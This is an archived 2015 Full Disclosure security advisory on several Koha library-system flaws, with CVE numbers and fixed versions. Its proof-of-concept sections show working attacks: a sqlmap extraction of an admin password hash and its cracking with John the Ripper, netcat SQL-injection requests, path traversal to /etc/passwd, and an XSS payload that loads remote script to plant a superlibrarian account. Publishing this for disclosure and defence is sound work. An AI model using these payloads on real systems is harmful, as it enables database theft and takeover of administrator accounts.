List: full-disclosure
Subject: [FD] SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS
From: Raschin Ghanad-Tavakoli <RGhanad-Tavakoli () sba-research ! org>
Date: 2015-06-25 17:01:01
Message-ID: 1435251638046.5953 () sba-research ! org
===============================================================================================
SBA Research Vulnerability Disclosure
===============================================================================================
title: Koha Unauthenticated SQL injection
product: Koha ILS
affected version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
fixed version: 3.20.1, 3.17.8, 3.16.12
CVE numbers: CVE-2015-4633, CVE-2015-4632, CVE-2015-4631
impact: critical
website: http://www.koha-community.org/
found by: Raschin Tavakoli / SBA Research Combinatorial Security Testing Group
contact: cst@sba-research.org
References: http://koha-community.org/security-release-koha-3-20-1/
http://koha-community.org/security-release-koha-3-18-8/
http://koha-community.org/security-release-koha-3-16-12/
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423
===============================================================================================
==========================
1. Multiple SQL Injections
==========================
+ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +
+ a) Unauthenticated SQL Injection in OPAC interface (CVE-2015-4633) +
+ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +
Vulnerability:
--------------
The url parameter 'number' in /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI.
Impact:
-------
By injecting malicious SQL code a remote attacker can access the database and read arbitrary data. If the \
webserver is misconfigured, the file system may be accessed as well.
References:
-----------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412
# ################################################################################################## #
# PoC: #
# ################################################################################################## #
1. Inspect Koha database schema
Have a look at how to query the database for superlibrarian users:
http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians
So basically we need to execute an SQL statement like this:
sql-shell> select userid, password from borrowers where flags=1 and password is not null order by \
borrowernumber desc limit 1;
2. Query the database with sqlmap
So let's fire up sqlmap with the --sql-shell parameter and input the query:
root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p \
number --technique=T --dbms=MySQL --sql-shell --time-sec=4
sqlmap {1.0-dev-nongit-20150513} http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. \
It is the end user's responsibility to obey all applicable local, state and federal laws. Developers \
assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:20:07
[09:20:07] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: number (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: number=1 PROCEDURE \
ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1)
---
[09:20:09] [INFO] testing MySQL
[09:20:09] [INFO] confirming MySQL
[09:20:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
[09:20:09] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select userid, password from borrowers where flags=1 and password is not null order by \
borrowernumber desc limit 1;
[09:20:25] [INFO] fetching SQL SELECT statement query output: 'select userid, password from borrowers \
where flags=1 and password is not null order by borrowernumber desc limit 1'
[09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into \
distinct queries to be able to retrieve the output even if we are going blind
[09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based \
payloads to prevent potential errors
admin
[09:21:46] [INFO] retrieved: $2a$08$taQ
[09:23:33] [ERROR] invalid character detected. retrying..
[09:23:33] [WARNING] increasing time delay to 5 seconds
afOgEEhU
[09:25:10] [ERROR] invalid character detected. retrying..
[09:25:10] [WARNING] increasing time delay to 6 seconds
t/gW
[09:26:13] [ERROR] invalid character detected. retrying..
[09:26:13] [WARNING] increasing time delay to 7 seconds
TOmqnYe1Y6ZNxCENa
[09:29:57] [ERROR] invalid character detected. retrying..
[09:29:57] [WARNING] increasing time delay to 8 seconds
2.ONk2eZhnuEw5z9OjjxS
[09:35:08] [ERROR] invalid character detected. retrying..
[09:35:08] [WARNING] increasing time delay to 9 seconds
select userid, password from borrowers where flags=1 and password is not null order by borrowernumber \
desc limit 1;: 'admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS'
3. Feed john the ripper and be lucky
root@kali:/home/wicked# echo '$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS' > ./admin-pass
root@kali:/home/wicked# john ./admin-pass
Loaded 1 password hash (OpenBSD Blowfish [32/64 X2])
admin (?)
guesses: 1 time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015) c/s: 260 trying: Smokey - allstate
Use the "--show" option to display all of the cracked passwords reliably
root@kali:/home/wicked# john ./admin-pass --show
?:admin
1 password hash cracked, 0 left
4. Log in with username "admin" and password "admin" ;)
# ################################################################################################## #
# PoC End #
# ################################################################################################## #
+ +++++++++++++++++++++++++++++++++++ +
+ b) SQL Injection in STAFF interface +
+ +++++++++++++++++++++++++++++++++++ +
Vulnerability:
--------------
An SQL injection vulnerability in /cgi-bin/koha/reports/borrowers_out.pl allows remote attackers to read \
arbitrary data from the database due to improper input validation of the parameters Filter and Criteria.
Impact:
-------
By injecting malicious SQL a remote attacker can read arbitrary data from the database. If the webserver \
is misconfigured, read & write access to the filesystem may be possible.
References:
-----------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426
# ################################################################################################## #
# PoC: #
# ################################################################################################## #
====================================================================
1. "Criteria" Parameter, Payload: ELT(1=1,'evil') / ELT(1=2,'evil')
====================================================================
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: \
186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&u \
serid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')" | nc \
testbox 9002
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: \
186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&u \
serid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')" | nc \
testbox 9002
====================================================================
2. "Filter" Parameter, Payload: P_COM'+AND+'a'='a / P_COM'+AND+'a'='b
====================================================================
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: \
183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep \
=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='a" | nc \
testbox 9002
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: \
183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep \
=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='b" | nc \
testbox 9002
====================================================================
You will notice different output in every second request, demonstrating the evaluation of the payload.
# ################################################################################################## #
# PoC End #
# ################################################################################################## #
=================================
3. Path Traversal (CVE-2015-4633)
=================================
Vulnerability
-------------
The "template_path" parameter in /cgi-bin/koha/svc/virtualshelves/search and /cgi-bin/koha/svc/members/search is \
vulnerable to path traversal.
Impact
------
A remote attacker may read arbitrary files on the system.
References
----------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
# ################################################################################################## #
# PoC: #
# ################################################################################################## #
The following input is used to print out /etc/passwd:
/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
# ################################################################################################## #
# PoC End #
# ################################################################################################## #
=================================
4. XSS and XSRF
=================================
Vulnerability
-------------
Koha suffers from various critical XSS and XSRF vulnerabilities due to improper input validation. The \
site also lacks the challenge tokens that would prevent cross-site request forgery (XSRF) attacks.
The attack can be performed:
- through a compromised user account; user/password retrieval can happen via brute force, sniffing or \
through SQLI (CVE-2015-4633)
- through a user clicking a malicious link (phishing mail, forum link etc.)
The following pages are affected from stored XSS flaws:
/cgi-bin/koha/opac-shelves.pl
/cgi-bin/koha/virtualshelves/shelves.pl
The following pages are affected by reflected XSS flaws:
/cgi-bin/koha/opac-shelves.pl (parameters: "direction", "display")
/cgi-bin/koha/opac-search.pl (parameters: "tag")
/cgi-bin/koha/authorities/authorities-home.pl (parameters: "value")
/cgi-bin/koha/acqui/lateorders.pl (parameters: "delay")
/cgi-bin/koha/admin/auth_subfields_structure.pl (parameters: "authtypecode","tagfield")
/cgi-bin/koha/admin/marc_subfields_structure.pl (parameters: "tagfield")
/cgi-bin/koha/catalogue/search.pl (parameters: "limit")
/cgi-bin/koha/serials/serials-search.pl (parameters: "bookseller_filter", "callnumber_filter", \
"EAN_filter", "ISSN_filter", "publisher_filter", "title_filter")
/cgi-bin/koha/suggestion/suggestion.pl (parameters: "author", "collectiontitle", "copyrightdate", "isbn", \
"manageddate_from", "manageddate_to", "publishercode", "suggesteddate_from", "suggesteddate_to")
Impact
----------
The vulnerabilities allow remote attackers to inject arbitrary web script or HTML in order to:
- escalate privileges by targeting staff members with XSRF
- target users via browser exploits
- target the webserver by combining with other server-side vulnerabilities.
References
----------------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418
# ################################################################################################## #
# PoC / Attack Scenario: #
# ################################################################################################## #
Alice, a student with restricted permissions on the system, receives a phishing mail (or finds the link in \
some forum) and clicks the following link:
--> http://<opac-interface>/cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=Malicious+Input+<script+src='h \
ttp://cst.sba-research.org/x.js'/>&sortfield=title&category=2&allow_add=0&allow_delete_own=1&allow_delete_other=0
Bob, the library admin, notices the new malicious list entry. He logs into the staff area and browses the \
public lists in order to delete the entry. Once he opens
--> http://<staff-interface>/cgi-bin/koha/virtualshelves/shelves.pl
the malicious code gets executed. The code can then perform any unauthorized actions with the permissions \
of user Bob. For example:
Create new user:
-----------------------
--> http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=&destination=&check_member=&borrowern \
umber=&nodouble=&title=&firstname=&othernames=&sex=&streetnumber=&streettype=&address2=&city=&state=&zipco \
de=&country=&phone=&phonepro=&mobile=&email=&emailpro=&fax=&B_address=&B_address2=&B_city=&B_state=&B_zipc \
ode=&B_country=&B_phone=&B_email=&contactnote=&altcontactsurname=&altcontactfirstname=&altcontactaddress1= \
&altcontactaddress2=&altcontactaddress3=&altcontactstate=&altcontactzipcode=&altcontactcountry=&altcontact \
phone=&sort1=&sort2=&dateexpiry=&opacnote=&borrowernotes=&patron_attr_1=&BorrowerMandatoryField=surname%7C \
dateofbirth%7Ccardnumber%7Caddress&category_type=A&updtype=I&op=insert&surname=hacker&dateofbirth=10%2F06% \
2F2000&address=fictional&select_city=%7C%7C%7C&cardnumber=9182734629182364&branchcode=MAURES&categorycode= \
P_COM&dateenrolled=24%2F06%2F2015&userid=hacker&password=hacker&password2=hacker&patron_attr_1_code=PROFES \
SION&setting_messaging_prefs=1&modify=yes&borrowernumber=&save=Save&setting_extended_patron_attributes=1
Give the new user superlibrarian permission:
--------------------------------------------
--> http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855&newflags=1&flag=superlibrarian
The attacker can now log in as superlibrarian.
Side Note: In order to make the attack work, Alice needs to be logged in to the Open Public Catalog \
interface when she clicks the malicious link. Alice needs to have access to the OPAC interface and to \
have permission to create public lists.
# ################################################################################################## #
# PoC / Attack Scenario End #
# ################################################################################################## #
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/